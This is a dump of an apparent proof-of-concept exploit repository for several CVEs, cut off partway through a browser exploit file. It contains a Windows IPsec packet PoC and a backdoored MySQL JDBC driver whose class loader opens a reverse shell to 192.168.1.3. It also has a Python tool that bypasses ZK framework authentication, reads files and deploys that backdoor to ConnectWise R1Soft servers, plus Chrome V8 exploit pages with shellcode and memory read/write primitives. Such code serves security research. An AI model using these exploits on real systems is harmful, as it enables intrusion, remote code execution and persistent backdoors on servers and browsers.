Repository: numencyber/Vulnerability_PoC
Branch: main
Commit: 8fccb7c069f9
Files: 20
Total size: 16.5 MB
Directory structure:
gitextract_jn422405/
├── CVE-2022-34718/
│ └── poc.cpp
├── CVE-2022-36537/
│ ├── Driver.java
│ ├── chromedriver
│ ├── cve-2022-36537.py
│ ├── mysql-connector-java-5.1.48.jar
│ └── requirements.txt
├── CVE-2022-3723/
│ ├── 01.html
│ ├── Readme.md
│ ├── arr.html
│ ├── exp.html
│ ├── go.mod
│ ├── go.sum
│ └── mainHttps.go
├── CVE-2023-23410/
│ └── CVE-2023-23410_poc.c
├── CVE-2023-28231/
│ └── CVE-2023-28231-DHCP-VUL-PoC.cpp
├── CVE-2023-29336/
│ └── poc.cpp
├── CVE-2023-41047/
│ └── CVE-2023-41047.go
├── CVE-2024-24919/
│ └── exp.py
├── CVE-2026-5283/
│ └── poc.html
└── README.md
================================================
FILE CONTENTS
================================================
================================================
FILE: CVE-2022-34718/poc.cpp
================================================
////////////////////////////////////////////////
// ScannerDemo.cpp file
#include "../common/initsock.h"
#include <windows.h>
#include <stdio.h>
#include "ntddndis.h"
#include "protoutils.h"
#include "ProtoPacket.h"
#include <Stdint.h>
#include "Iphlpapi.h"
#pragma comment(lib, "Iphlpapi.lib")
#pragma comment(lib, "Bcrypt.lib")
#include "../common/comm.h"
// Forward declarations. SendThread is declared but never defined or called in this file.
DWORD WINAPI SendThread(LPVOID lpParam);
BOOL GetGlobalData();
// Local adapter data filled in by GetGlobalData() from the first adapter.
u_char g_ucLocalMac[6];
DWORD g_dwGatewayIP;
DWORD g_dwLocalIP;
DWORD g_dwMask;
CInitSock theSock;
// AES handles: declared here but not referenced anywhere in this file.
BCRYPT_ALG_HANDLE m_hAesAlg;
BCRYPT_KEY_HANDLE m_hKey;
PBYTE m_pbKeyObject;
PBYTE m_pbIV;
//Handle for Hash
BCRYPT_HASH_HANDLE m_hHash;
PBYTE m_pbHashObject;
BCRYPT_ALG_HANDLE m_hHashAlg;
// Output of SHA1(): 20 bytes (0x14); main() copies only the first 12 of them.
BYTE rgbHash[0x14];
// 20-byte secret handed to BCryptCreateHash() inside SHA1().
UCHAR str_SHA1_key[] =
"\xbc\x3d\x6e\x74\x2d\xd2\x13\xbe\x0b\xa9\x42\xb7\x33\xa4\x7a\xf4\x9b\xa2\xa8\x90";
// Value main() copies into both frames at offset 0x36; kept in network byte order.
UINT32 spi = htonl(0x861b157c);
// Computes a keyed SHA-1 (HMAC) over `len` bytes at `str_data` with the global
// str_SHA1_key and leaves the 20-byte digest in the global rgbHash.
// The literal flag 8 passed to BCryptOpenAlgorithmProvider is
// BCRYPT_ALG_HANDLE_HMAC_FLAG, which is what allows a secret in BCryptCreateHash.
// Review notes: every NTSTATUS is ignored, so rgbHash may hold stale bytes after
// a failure; hKey, temp and cbData are unused; m_pbHashObject is malloc'ed on
// each call and never freed, and neither the hash object nor the provider
// handle is released (main() calls this twice).
void SHA1(PUCHAR str_data, DWORD len)
{
    BCRYPT_KEY_HANDLE hKey = NULL;
    DWORD cbHashObject, cbResult, temp = 0;
    DWORD cbData = 0;
    BCryptOpenAlgorithmProvider(&m_hHashAlg, BCRYPT_SHA1_ALGORITHM, NULL, 8);
    // Determine the size of the Hash object
    BCryptGetProperty(m_hHashAlg, BCRYPT_OBJECT_LENGTH, (PBYTE)&cbHashObject, sizeof(DWORD), &cbResult, 0);
    m_pbHashObject = (PBYTE)malloc(cbHashObject);
    // Create the Hash object
    BCryptCreateHash(m_hHashAlg, &m_hHash, m_pbHashObject, cbHashObject, str_SHA1_key, 0x14, 0);
    // Hash the data
    BCryptHashData(m_hHash, (PBYTE)str_data, len, 0);
    // Finish the hash
    BCryptFinishHash(m_hHash, rgbHash, 0x14, 0);
    return ;
}
// Fills g_ucLocalMac / g_dwGatewayIP / g_dwLocalIP / g_dwMask from the first
// adapter returned by GetAdaptersInfo. The initial call with a NULL buffer only
// obtains the required size in ulLen; the buffer is then allocated with
// GlobalAlloc and the query repeated. Always returns TRUE, even when the second
// call fails (the globals are then left untouched).
// Review notes: the GlobalAlloc result is not NULL-checked before being passed
// on, and only the head of the adapter list is ever looked at.
BOOL GetGlobalData()
{
    PIP_ADAPTER_INFO pAdapterInfo = NULL;
    ULONG ulLen = 0;
    ::GetAdaptersInfo(pAdapterInfo, &ulLen);
    pAdapterInfo = (PIP_ADAPTER_INFO)::GlobalAlloc(GPTR, ulLen);
    if (::GetAdaptersInfo(pAdapterInfo, &ulLen) == ERROR_SUCCESS)
    {
        if (pAdapterInfo != NULL)
        {
            memcpy(g_ucLocalMac, pAdapterInfo->Address, 6);
            g_dwGatewayIP = ::inet_addr(pAdapterInfo->GatewayList.IpAddress.String);
            g_dwLocalIP = ::inet_addr(pAdapterInfo->IpAddressList.IpAddress.String);
            g_dwMask = ::inet_addr(pAdapterInfo->IpAddressList.IpMask.String);
        }
    }
    ::GlobalFree(pAdapterInfo);
    return TRUE;
}
// Entry point. Reads adapter data, starts the packet driver service, opens the
// first enumerated adapter with a directed/multicast/broadcast filter, patches
// two fixed raw frames (SPI at 0x36, 12 bytes of the keyed hash at 0x62) and
// sends them, then stops the service. Returns -1 on any setup failure.
// Offset 0x36 = 14-byte Ethernet header + 40-byte IPv6 header; 0x2c bytes
// from there are hashed and 0x36 + 0x2c == 0x62 is where the digest goes.
// sizeof(frame) - 1 drops the string literal's NUL terminator.
// Review note: hControlDevice is never closed on any path in this file.
int main()
{
    GetGlobalData();
    if (!ProtoStartService())
    {
        printf(" ProtoStartService() failed %d \n", ::GetLastError());
        return -1;
    }
    HANDLE hControlDevice = ProtoOpenControlDevice();
    if (hControlDevice == INVALID_HANDLE_VALUE)
    {
        printf(" ProtoOpenControlDevice() failed() %d \n", ::GetLastError());
        ProtoStopService();
        return -1;
    }
    CPROTOAdapters adapters;
    if (!adapters.EnumAdapters(hControlDevice))
    {
        printf(" Enume adapter failed \n");
        ProtoStopService();
        return -1;
    }
    CAdapter adapter;
    // Only the first symbolic link is tried; FALSE is the second OpenAdapter argument as given.
    if (!adapter.OpenAdapter(adapters.m_pwszSymbolicLink[0], FALSE))
    {
        printf(" OpenAdapter failed \n");
        ProtoStopService();
        return -1;
    }
    adapter.SetFilter( // NDIS_PACKET_TYPE_PROMISCUOUS|
        NDIS_PACKET_TYPE_DIRECTED |
        NDIS_PACKET_TYPE_MULTICAST | NDIS_PACKET_TYPE_BROADCAST);
    UCHAR ipv6_ESP_Fragment_1[] =
        "\x00\x0c\x29\x1c\x11\x93\x00\x0c\x29\x5c\x9a\x88\x86\xdd\x60\x00"
        "\x00\x00\x00\x38\x32\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x81\x85"
        "\xb1\x51\x19\x43\x54\x19\xfe\x80\x00\x00\x00\x00\x00\x00\xf8\xe5"
        "\x70\x83\x16\x6f\xef\x6b"
        "\x41\x41\x41\x41\x00\x00\x00\x21"//SPI+Seq
        "\x2c\x00\x00\x01\x52\x52\x52\x52\x32\x00\x00\x01\x96\x74\xd9\x9d"
        "\x2b\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00"
        "\x01\x02\x02\x2c"//ESP tail
        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";//HMAC;
    UCHAR ipv6_ESP_Fragment_2[] =
        "\x00\x0c\x29\x1c\x11\x93\x00\x0c\x29\x5c\x9a\x88\x86\xdd\x60\x00"
        "\x00\x00\x00\x38\x32\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x81\x85"
        "\xb1\x51\x19\x43\x54\x19\xfe\x80\x00\x00\x00\x00\x00\x00\xf8\xe5"
        "\x70\x83\x16\x6f\xef\x6b"
        "\x41\x41\x41\x41\x00\x00\x00\x22"//SPI+Seq
        "\x2c\x00\x00\x18\x52\x52\x52\x52\x32\x00\x00\x00\x96\x74\xd9\x9d"
        "\x2b\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00"
        "\x01\x02\x02\x2c"//ESP tail
        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";//HMAC;
    // Placeholder 0x41 bytes are overwritten in place: SPI, then the truncated digest.
    memcpy(ipv6_ESP_Fragment_1 + 0x36, &spi, 4);
    SHA1(&ipv6_ESP_Fragment_1[0x36], 0x2c);
    memcpy(ipv6_ESP_Fragment_1 + 0x62, rgbHash, 0x0c);
    memcpy(ipv6_ESP_Fragment_2 + 0x36, &spi, 4);
    SHA1(&ipv6_ESP_Fragment_2[0x36], 0x2c);
    memcpy(ipv6_ESP_Fragment_2 + 0x62, rgbHash, 0x0c);
    adapter.SendData(ipv6_ESP_Fragment_1, sizeof(ipv6_ESP_Fragment_1)-1);
    adapter.SendData(ipv6_ESP_Fragment_2, sizeof(ipv6_ESP_Fragment_2)-1);
    ProtoStopService();
    return 0;
}
================================================
FILE: CVE-2022-36537/Driver.java
================================================
package com.mysql.jdbc;
import java.sql.*;
import java.util.*;
import java.util.logging.Logger;
/*
author: Bearcat of www.numencyber.com
desc : Mysql jdbc backdoor driver
*/
/**
 * Replacement for com.mysql.jdbc.Driver whose static initializer spawns a
 * process the moment the class is loaded; every java.sql.Driver method is an
 * inert stub (null / false / 0), so the driver can never open a connection.
 * The child process is the only observable effect, which is what a detection
 * rule should key on: cmd.exe or /bin/bash started by a JVM during JDBC
 * driver loading.
 */
public class Driver implements java.sql.Driver {
    static {
        String winCmd = "calc";
        String linuxCmd = "bash -i >& /dev/tcp/192.168.1.3/2022 0>&1";
        String[] cmds = null;
        // Interpreter is chosen by os.name; the command text is fixed at build time.
        if (System.getProperty("os.name").toLowerCase().contains("win")) {
            cmds = new String[]{"cmd.exe", "/c", winCmd};
        } else {
            cmds = new String[]{"/bin/bash", "-c", linuxCmd};
        }
        try {
            Runtime.getRuntime().exec(cmds);
        } catch (Exception ignored) {
            // do nothing... (a failed exec is never reported to the loader)
        }
    }
    // Stub: always null, so callers that expect a Connection will NPE or fall through.
    @Override
    public Connection connect(String url, Properties info) throws SQLException {
        return null;
    }
    // Stub: claims no URL, so DriverManager never selects this driver.
    @Override
    public boolean acceptsURL(String url) throws SQLException {
        return false;
    }
    @Override
    public DriverPropertyInfo[] getPropertyInfo(String url, Properties info) throws SQLException {
        return new DriverPropertyInfo[0];
    }
    @Override
    public int getMajorVersion() {
        return 0;
    }
    @Override
    public int getMinorVersion() {
        return 0;
    }
    @Override
    public boolean jdbcCompliant() {
        return false;
    }
    @Override
    public Logger getParentLogger() throws SQLFeatureNotSupportedException {
        return null;
    }
}
================================================
FILE: CVE-2022-36537/chromedriver
================================================
[File too large to display: 16.4 MB]
================================================
FILE: CVE-2022-36537/cve-2022-36537.py
================================================
#!/usr/bin/env python3
# coding: utf-8
"""
@File : cve-2022-36537.py
@Time : 2022/11/11 23:34
@Author : Bearcat of www.numencyber.com
@Version : 1.0
@Desc : ZK framework authentication bypass & connectWise r1Soft server backup manager remote code execution.
"""
import sys
import subprocess
import os
import warnings
import re
import zipfile
import shutil
import requests
from requests_toolbelt import MultipartEncoder
import urllib3
from selenium import webdriver
from rich import print as rprint
import argparse
# Silences urllib3's InsecureRequestWarning: every request below passes verify=False.
urllib3.disable_warnings()
# proxy = {
# "http": "http://127.0.0.1:8080"
# }
# Proxy mapping handed to every requests call; empty means connect directly.
proxy = {}
# https://chromedriver.storage.googleapis.com/index.html?path=107.0.5304.62/
def bypass_auth1(target: str):
    """Deprecated variant: load ``target`` in headless Chrome and read the desktop id and session cookie.

    Superseded by bypass_auth2(), which obtains the same (dtid, cookie_str) pair
    with a single GET. Any exception is printed and the process exits.
    Review notes: the Chrome driver is never quit, so the browser process
    outlives this call; ``executable_path`` is the Selenium 3 keyword, which
    selenium 4.7 (requirements.txt) still accepts but reports as deprecated.
    """
    warnings.warn("Discard. The bypass auch2 function is simpler to obtain dtid and cookies.", DeprecationWarning)
    rprint("[italic green][*] Bypass authentication.")
    try:
        opt = webdriver.ChromeOptions()
        opt.add_argument('--headless')
        opt.add_argument('--ignore-certificate-errors')
        driver = webdriver.Chrome(executable_path='./chromedriver', options=opt)
        driver.get(target)
        cookie_str = "JSESSIONID=" + driver.get_cookie("JSESSIONID")['value']
        # First key of zk.Desktop.all is the desktop id; the loop returns on its first iteration.
        dtid = driver.execute_script("""
for (var dtid in zk.Desktop.all)
return dtid
""")
        return dtid, cookie_str
    except Exception as e:
        rprint("[italic red][-] Bypass authentication failed. {0}".format(e))
        exit()
def bypass_auth2(target: str):
    """GET ``{target}/login.zul`` and return (dtid, cookie_str) from the unauthenticated response.

    The cookie is the first attribute of the Set-Cookie header; the desktop id
    is the first ``dt:'…',cu:`` match in the body. TLS verification is off
    (verify=False). A missing header (KeyError) or no match (IndexError) is
    caught by the broad except, printed, and ends the process via exit().
    """
    rprint("[italic green][*] Bypass authentication.")
    uri = "{0}/login.zul".format(target)
    try:
        result = requests.get(url=uri, timeout=3, verify=False, proxies=proxy)
        cookie_str = result.headers['Set-Cookie'].split(";")[0]
        r = u"dt:'(.*?)',cu:"
        regex = re.compile(r)
        dtid = regex.findall(result.text)[0]
        return dtid, cookie_str
    except Exception as e:
        rprint("[italic red][-] Bypass authentication failed. {0}".format(e))
        exit()
def forward_request(target: str, next_uri: str, cookie_str: str, uuid: str, dtid: str):
    """POST a multipart form whose only field is ``nextURI=next_uri`` to the zkau upload endpoint.

    The session cookie is sent verbatim in the Cookie header and the multipart
    boundary is fixed. Returns the requests.Response; any exception is printed
    and the process exits. ``uuid`` and ``dtid`` go into the query string unescaped.
    """
    uri = "{0}/zkau/upload?uuid={1}&dtid={2}&sid=0&maxsize=-1".format(target, uuid, dtid)
    param = {"nextURI": (None, next_uri)}
    headers = {"Cookie": cookie_str}
    data = MultipartEncoder(param, boundary="----WebKitFormBoundaryCs6yB0zvpfSBbYEp")
    headers["Content-Type"] = data.content_type
    try:
        result = requests.post(url=uri, headers=headers, data=data.to_string(), timeout=3, verify=False, proxies=proxy)
        return result
    except Exception as e:
        rprint("[italic red][-] Forward request failed. {0}".format(e))
        exit()
def read_file(target: str, filename: str) -> str:
    """Obtain a session via bypass_auth2, forward ``filename`` as nextURI and return the body wrapped in start/end markers."""
    # get login_dtid
    login_dtid, cookie_str = bypass_auth2(target)
    rprint("[italic green][*] Start reading the file:")
    # "101010" is a fixed widget uuid used for every forwarded request in this script.
    result = forward_request(target, filename, cookie_str, "101010", login_dtid)
    return "-----file start-----\n{0}\n-----file end-----".format(result.text)
def deploy_jdbc_backdoor(target: str):
    """Interactive deploy flow: confirm at the prompt, get a session via bypass_auth2,
    build jdbc_backdoor.jar, then replay the database-drivers.zul upload dialog
    sequence (button click, upload, dialog move, dialog close) through forward_request.

    Review notes: ``play_again[0]`` raises IndexError on an empty answer instead
    of aborting cleanly; every ``findall(...)[0]`` raises IndexError unhandled
    when the page does not contain the expected widget ids.
    """
    rprint(
        "[italic red][!] The jdbc backdoor can only be deployed once, please make it persistent, such as rebounding the shell.")
    play_again = input("Whether to continue? (y/n):").lower()
    if play_again[0] != "y":
        exit()
    # get login_dtid
    login_dtid, cookie_str = bypass_auth2(target)
    rprint("[italic green][*] Start deploying the jdbc backdoor.")
    build_jdbc_backdoor()
    # database_dtid and mysql_driver_upload_button_id
    uri = "/Configuration/database-drivers.zul"
    result = forward_request(target, uri, cookie_str, "101010", login_dtid)
    r1 = u"{dt:'(.*?)',cu:"
    regex = re.compile(r1)
    database_dtid = regex.findall(result.text)[0]
    r1 = u"'zul.wgt.Button','(.*?)',"
    regex = re.compile(r1)
    mysql_driver_upload_button_id = regex.findall(result.text)[0]
    uri = "/zkau?dtid={0}&cmd_0=onClick&uuid_0={1}&data_0=%7B%22pageX%22%3A315%2C%22pageY%22%3A120%2C%22which%22%3A1%2C%22x%22%3A39%2C%22y%22%3A23%7D".format(
        database_dtid, mysql_driver_upload_button_id)
    result = forward_request(target, uri, cookie_str, "101010", login_dtid)
    # file_upload_dlg_id and file_upload_id
    r1 = u"zul.fud.FileuploadDlg','(.*?)',"
    regex = re.compile(r1)
    file_upload_dlg_id = regex.findall(result.text)[0]
    r1 = u"zul.wgt.Fileupload','(.*?)',"
    regex = re.compile(r1)
    file_upload_id = regex.findall(result.text)[0]
    uri = "{0}/zkau/upload?uuid={1}&dtid={2}&sid=0&maxsize=-1".format(target, file_upload_id, database_dtid)
    upload_jdbc_backdoor(uri, cookie_str)
    uri = "/zkau?dtid={0}&cmd_0=onMove&opt_0=i&uuid_0={1}&data_0=%7B%22left%22%3A%22716px%22%2C%22top%22%3A%22100px%22%7D&cmd_1=onZIndex&opt_1=i&uuid_1={2}&data_1=%7B%22%22%3A1800%7D&cmd_2=updateResult&data_2=%7B%22contentId%22%3A%22z__ul_0%22%2C%22wid%22%3A%22{3}%22%2C%22sid%22%3A%220%22%7D".format(
        database_dtid, file_upload_dlg_id, file_upload_dlg_id, file_upload_id)
    forward_request(target, uri, cookie_str, "101010", login_dtid)
    uri = "/zkau?dtid={0}&cmd_0=onClose&uuid_0={1}&data_0=%7B%22%22%3Atrue%7D".format(database_dtid,
                                                                                     file_upload_dlg_id)
    forward_request(target, uri, cookie_str, "101010", login_dtid)
def upload_jdbc_backdoor(uri: str, cookie_str: str):
    """POST the local jdbc_backdoor.jar (named b.jar, application/java-archive) to ``uri`` with the session cookie.

    Review notes: the handle returned by open() is never closed explicitly;
    the response is discarded, so an HTTP error status is not detected;
    any exception prints a message and exits the process.
    """
    rprint("[italic green][*] Upload the database driver.")
    headers = {"Cookie": cookie_str}
    files = {'file': ('b.jar', open('jdbc_backdoor.jar', 'rb'), 'application/java-archive')}
    try:
        requests.post(uri, files=files, headers=headers, timeout=6, verify=False, proxies=proxy)
    except Exception as e:
        rprint("[italic red][-] Upload the database driver failed. {0}".format(e))
        exit()
def build_jdbc_backdoor():
    """Compile Driver.java, then repackage mysql-connector-java-5.1.48.jar as jdbc_backdoor.jar
    with com/mysql/jdbc/Driver.class swapped for the freshly compiled class.

    Review notes: javac's exit status is never checked (its output is read and
    dropped), so a compile failure only surfaces later as a FileNotFoundError
    on Driver.class; os.mkdir raises FileExistsError when jdbc_jar survived an
    earlier run; the explicit close() calls inside the ``with`` blocks are
    redundant.
    """
    rprint("[italic green][*] Compile java code.")
    # Fixed command string: shell=True carries no untrusted input here.
    java_cmd = 'javac -source 1.5 -target 1.5 Driver.java'
    popen = subprocess.Popen(java_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    popen.stdout.read()
    tmp_path = 'jdbc_jar'
    os.mkdir(tmp_path)
    with zipfile.ZipFile('mysql-connector-java-5.1.48.jar', 'r', zipfile.ZIP_DEFLATED) as unzf:
        unzf.extractall("jdbc_jar")
        unzf.close()
    os.remove('jdbc_jar/com/mysql/jdbc/Driver.class')
    shutil.copy('Driver.class', 'jdbc_jar/com/mysql/jdbc/')
    with zipfile.ZipFile('jdbc_backdoor.jar', 'w', zipfile.ZIP_DEFLATED) as zf:
        for root, dirs, files in os.walk(tmp_path):
            # Archive names are the path relative to tmp_path (root itself maps to '').
            relative_root = '' if root == tmp_path else root.replace(tmp_path, '') + os.sep
            for filename in files:
                zf.write(os.path.join(root, filename), relative_root + filename)
        zf.close()
    shutil.rmtree(tmp_path)
    rprint("[italic green][*] Build jdbc backdoor success.")
def banner():
    """Print the two-line tool banner through rich, one call per line."""
    lines = (
        "[italic white]CVE-2022-36537:\n\tZK framework authentication bypass",
        "[italic white]\tConnectWise r1Soft server backup manager remote code execution",
    )
    for line in lines:
        rprint(line)
def parse_args():
    """Build the CLI parser and parse sys.argv.

    Options: -u/--url, -r/--read (strings, default ''), -b/--build and
    -d/--deploy (flags). When no argument at all was given, '-h' is appended
    to sys.argv first so argparse prints usage and exits instead of running
    with empty defaults.
    """
    parser = argparse.ArgumentParser(
        prog='cve-2022-36537',
        formatter_class=argparse.RawTextHelpFormatter,
        description='author: Bearcat of www.numencyber.com',
        usage='cve-2022-36537.py [options]',
    )
    option_table = (
        (('-u', '--url'), dict(type=str, default='', help='target url')),
        (('-r', '--read'), dict(type=str, default='', help='reading the file')),
        (('-b', '--build'), dict(action="store_true", help='build jdbc backdoor')),
        (('-d', '--deploy'), dict(action="store_true", help='deploying the jdbc backdoor')),
    )
    for flags, spec in option_table:
        parser.add_argument(*flags, **spec)
    if len(sys.argv) == 1:
        sys.argv.append('-h')
    return parser.parse_args()
if __name__ == '__main__':
    banner()
    args = parse_args()
    # Modes are tried in this fixed order and each one exits when done, so at
    # most one runs per invocation; --read and --deploy both require --url.
    if args.url and args.read:
        print(read_file(args.url, args.read))
        exit()
    if args.build:
        build_jdbc_backdoor()
        exit()
    if args.url and args.deploy:
        deploy_jdbc_backdoor(args.url)
        exit()
================================================
FILE: CVE-2022-36537/requirements.txt
================================================
requests==2.28.1
requests_toolbelt==0.10.1
rich==12.6.0
selenium==4.7.2
urllib3==1.25.3
================================================
FILE: CVE-2022-3723/01.html
================================================
<body>
<div id="iframeContainer"></div>
</body>
<script>
// Top-level array that is dumped with % DebugPrint before and after each
// iframe is inserted. The `% ...` calls are V8 natives syntax: this script
// only parses when the browser runs with --allow-natives-syntax, otherwise
// it is a SyntaxError and nothing here executes.
var arr = [2.2, 2.2];
window.onload = function () {
    let frame = document.createElement("iframe");
    // basic settings
    frame.src = "arr.html"; // source of the iframe
    frame.height = "300px"; // height of the iframe
    frame.width = "300px"; // width of the iframe
    // insert the iframe into the HTML document
    let container = document.getElementById("iframeContainer");
    container.appendChild(frame);
    alert(1);
    % DebugPrint(arr);
    alert(2);
    let frame2 = document.createElement("iframe");
    // basic settings
    frame2.src = "exp.html"; // source of frame2
    frame2.height = "300px"; // height of frame2
    frame2.width = "300px"; // width of frame2
    // insert frame2 into the HTML document
    container.appendChild(frame2);
    alert(1);
    % DebugPrint(arr);
    alert(2);
};
</script>
================================================
FILE: CVE-2022-3723/Readme.md
================================================
Exploit of CVE-2022-3723
Based on Google's public PoC
================================================
FILE: CVE-2022-3723/arr.html
================================================
<script>
// 16-byte scratch buffer shared by the type-punning helpers below
// (biglow/bighi/f2big/big2f/flow/fhi/i2f); each of them overwrites offset 0.
var dv = new DataView(new ArrayBuffer(0x10));
// Allocation churn meant to encourage a minor GC: 0x100 throw-away arrays of
// length 0x200, none of them retained. Returns nothing.
function gc() {
    let remaining = 0x100;
    while (remaining-- > 0) {
        new Array(0x200);
    }
}
// Hex string of a BigInt. The `>> 0n` is a no-op shift that also enforces the
// BigInt requirement: passing a Number throws a TypeError.
const to_hex = (num) => (num >> 0n).toString(16);
// Low 32 bits of the BigInt b: written little-endian into the shared scratch
// view, then the first dword is read back.
function biglow(b) {
    dv.setBigUint64(0, b, true);
    const lowDword = dv.getUint32(0, true);
    return lowDword;
}
// High 32 bits of the BigInt b: written little-endian into the shared scratch
// view, then the dword at offset 4 is read back.
function bighi(b) {
    dv.setBigUint64(0, b, true);
    const highDword = dv.getUint32(4, true);
    return highDword;
}
// Raw IEEE-754 bits of the double f as a BigInt (little-endian both ways).
function f2big(f) {
    dv.setFloat64(0, f, true);
    const bits = dv.getBigUint64(0, true);
    return bits;
}
// Inverse of f2big: the double whose IEEE-754 bits are the BigInt b.
function big2f(b) {
    dv.setBigUint64(0, b, true);
    const asDouble = dv.getFloat64(0, true);
    return asDouble;
}
// Low dword of the double f's bit pattern (little-endian).
function flow(f) {
    dv.setFloat64(0, f, true);
    const lowDword = dv.getUint32(0, true);
    return lowDword;
}
// High dword of the double f's bit pattern (little-endian).
function fhi(f) {
    dv.setFloat64(0, f, true);
    const highDword = dv.getUint32(4, true);
    return highDword;
}
// Builds a double from two 32-bit halves: `low` becomes the low dword and
// `hi` the high dword of the bit pattern (little-endian), i.e. the inverse of flow/fhi.
function i2f(low, hi) {
    dv.setUint32(0, low, true);
    dv.setUint32(4, hi, true);
    const asDouble = dv.getFloat64(0, true);
    return asDouble;
}
// Tries up to 80 very large ArrayBuffer allocations (0x7ff00000000 + i bytes)
// to put pressure on the allocator, stopping at the first exception. The
// buffers are only held in a local and are dropped on return; returns nothing.
function majorGc() {
    const held = [];
    let i = 0;
    while (i < 80) {
        let buffer;
        try {
            buffer = new ArrayBuffer(0x7ff00000000 + i);
        } catch (err) {
            break;
        }
        held.push(buffer);
        i++;
    }
}
// ArrayBuffer subclass carrying two extra own properties, created in this
// order right after the buffer itself: rw, a two-element double array
// (1.7 == 0x3ffb333333333333), and slot, the 0xb33f marker that leakObj()
// later overwrites.
class LeakArrayBuffer extends ArrayBuffer {
    constructor(size) {
        super(size);
        const extras = { rw: [1.7, 1.7], slot: 0xb33f };
        Object.assign(this, extras);
    }
}
let shellcode = [2.222372952568011e+127,
3.4476922241098093e+40,
-2.5784757691472832e-254,
-1.476674265851898e-90,
2.582607795529539e-293,
2.4887534188622283e+253,
9.353354960368843e-158,
1.772861363575525e-297,
2.941218276584707e+26,
1.7578789445410664e-302,
-1.3535215646275278e-183,
1.19831254e-314];
// Allocates 0x1000 pairs of a two-double array and a LeakArrayBuffer; only the
// last pair stays referenced through arr/buff. GC is then requested four
// times via the best-effort majorGc()/gc() helpers.
var arr = null;
var buff = null;
for (let i = 0; i < 0x1000; i++) {
    arr = new Array(1.1, 1.1);
    buff = new LeakArrayBuffer(0x1337);
}
majorGc(); gc(); majorGc(); gc(); majorGc(); gc(); majorGc(); gc();
// Second stage, run once the allocations above have settled. leak() relies on
// the natives-syntax calls % PrepareFunctionForOptimization and
// % OptimizeFunctionOnNextCall, so this file only parses under
// --allow-natives-syntax. The value leak() returns is used as the path of a
// same-origin fetch(), and mainHttps.go parses that path — that request, plus
// the later "<hex>.wasm" fetch, are the network artifacts of this page.
{
    function leak() {
        function setInnerProperty(o, obj) {
            for (let m = 0; m < 0x100000; m++) {
                o.inner.foo = obj;
            }
        }
        function foo(str, addr) {
            var o = {
                inner: {
                    ['foo']: 1.5
                }
            };
            eval(str);// eval prevents inlining
            // o.inner.foo = addr;
            return o.inner.foo;
            // return arr;
        };
        % PrepareFunctionForOptimization(foo);
        // optimize setInnerProperty
        foo("setInnerProperty(o, arr);", 1.4);
        majorGc();
        foo("setInnerProperty(o, arr);", 1.4);
        majorGc();
        % OptimizeFunctionOnNextCall(foo);
        let o = foo("setInnerProperty(o, arr);", 1.4);
        // console.log(f2big(o).toString(16));
        return (f2big(o).toString(16));
    }
    let addr = leak();
    fetch(addr, {
        method: 'GET',
        mode: 'no-cors' // allow an insecure connection in a development environment
    })
        .then(response => {
            % DebugPrint("fuckhere");
            % DebugPrint(arr);
        }) // response.json() could be used instead if the response is known to be JSON
        .then(data => {
            // Fixed 2 s delay before re-checking arr.length.
            new Promise((resolve, reject) => {
                setTimeout(() => {
                    resolve();
                }, 2000);
            }).then(() => {
                if (arr.length !== 2) {
                    alert("length is changed!!check how to exp");
                    console.log("length is changed!!check how to exp");
                    function leakObj(o) {
                        buff.slot = o;
                        return fhi(arr[10]);
                    }
                    function write(addr_low, val) {
                        arr[15] = i2f((addr_low | 1) - 0x8, fhi(arr[15]));
                        buff.rw[0] = val;
                    }
                    function read(addr_low) {
                        arr[15] = i2f((addr_low | 1) - 0x8, fhi(arr[15]));
                        return buff.rw[0];
                    }
                    // randPE_addr = read(function_slot);
                    // alert(f2big(randPE_addr).toString(16).padStart(16, 0));
                    arr_addr = leakObj(shellcode);
                    raw_shellcode_addr = ((flow(read(arr_addr + 0x8))) | 1) - 1 + 0x8;
                    % DebugPrint(shellcode);
                    alert("raw_shellcode_addr:" + raw_shellcode_addr.toString(16).padStart(8, 0));
                    fetch(raw_shellcode_addr.toString(16).padStart(8, 0)+".wasm")
                        .then((response) => response.arrayBuffer())
                        .then((wasmBinary) => WebAssembly.compile(wasmBinary))
                        .then((wasmModule) => WebAssembly.instantiate(wasmModule))
                        .then((wasmInstance) => {
                            const { f } = wasmInstance.exports;
                            % DebugPrint("wasmInstance addr is:");
                            % DebugPrint(wasmInstance);
                            wasmInstance_addr = leakObj(wasmInstance);
                            alert("wasmInstance_addr:"+wasmInstance_addr.toString(16).padStart(8,0));
                            rx_mem_addr = f2big(read(wasmInstance_addr + 0x60));
                            alert("rx_mem_addr:"+rx_mem_addr.toString(16).padStart(16,0));
                            rop_start=rx_mem_addr+0x65dn;
                            // leak the function address and modify the backingStore
                            % DebugPrint("main func addr is:");
                            % DebugPrint(f);
                            faddr = leakObj(f);
                            alert("f addr:" + faddr.toString(16).padStart(8, 0));
                            function_slot = flow(read(faddr + 0x18)) + 0x10;
                            alert("function_slot and go to mem to check addr:" + function_slot.toString(16).padStart(8, 0));
                            write(function_slot,big2f(rop_start));
                            alert("check memory");
                            f();
                        });
                }
            });
        })
        .catch(error => {
            // handle any error raised in the .then() chain above
            console.error('Error:', error);
        });
}
</script>
================================================
FILE: CVE-2022-3723/exp.html
================================================
<script>
// Frame-level arr; shadowed by the local `var arr` inside main() within exp().
var arr = [2.2, 2.2];
// Whole stage in one closure. The inner helpers mirror arr.html's, but main()
// only uses i2f() and flow(); gc(), to_hex(), biglow(), bighi(), f2big(),
// big2f() and fhi() are unused here. The bare identifier `xxx` in main() is a
// placeholder that mainHttps.go replaces with a number when it serves
// exp.html; served as a raw file it is a ReferenceError. The `% ...` calls
// are V8 natives syntax (--allow-natives-syntax only).
function exp() {
    var dv = new DataView(new ArrayBuffer(0x10));
    function gc() {
        for (var i = 0; i < 0x100; i++) new Array(0x200);
    }
    const to_hex = num => {
        return (num >> 0n).toString(16);
    }
    // NOTE(review): setBigUint64 here uses the DataView default (big-endian)
    // while getUint32 reads little-endian, unlike the arr.html copy; unused.
    function biglow(b) {
        dv.setBigUint64(0, b);
        return (dv.getUint32(0, true));
    }
    function bighi(b) {
        dv.setBigUint64(0, b);
        return (dv.getUint32(4, true));
